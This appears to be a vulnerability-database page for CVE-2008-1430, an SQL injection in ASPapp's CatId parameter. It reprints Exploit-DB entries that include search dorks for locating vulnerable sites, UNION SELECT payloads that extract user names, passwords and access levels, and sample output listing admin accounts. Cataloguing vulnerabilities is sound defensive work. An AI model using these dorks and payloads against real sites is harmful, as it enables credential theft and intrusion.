CVE-2008-1430
published 2008-03-20CVE-2008-1430: SQL injection vulnerability in links.asp in ASPapp allows remote attackers to execute arbitrary SQL commands via the CatId parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.93%
56.1th percentile
SQL injection vulnerability in links.asp in ASPapp allows remote attackers to execute arbitrary SQL commands via the CatId parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASPapp Knowledge Base - SQL Injection
exploitdb·2008-03-20
CVE-2008-1430 ASPapp Knowledge Base - SQL Injection
ASPapp Knowledge Base - SQL Injection
---
..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-------------------------Turkey------------------------------
-----------------www.Hayalet-hack.com------------------------
-----------------www.xcorpitx-hack.com-----------------------
ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
thanx- str0ke-D3ng3siz-pc faresi-s@b
Exploit-DB
ASPapp Knowledge Base - 'CatId' SQL Injection (1)
exploitdb·2008-03-19
CVE-2008-1430 ASPapp Knowledge Base - 'CatId' SQL Injection (1)
ASPapp Knowledge Base - 'CatId' SQL Injection (1)
---
..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-----------------Turkey--------------------------------------
--------- www.Hayalet-hack.com-------------------------------
----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
you ll see lots of users like this but accesslevel ll help you for see admin
----------------example--------------------------------------
Links › guest › 12 › 1 user
Links › editor › editor › 2 materator
Links › manager› manager› 2 materator
Links › surco › surco › 2 materator
Links › admin › admin › 3 admin
Links › ovivas › ovivas › 4 super-admin----- we ll log
No writeups or analysis indexed.
2008-03-20
Published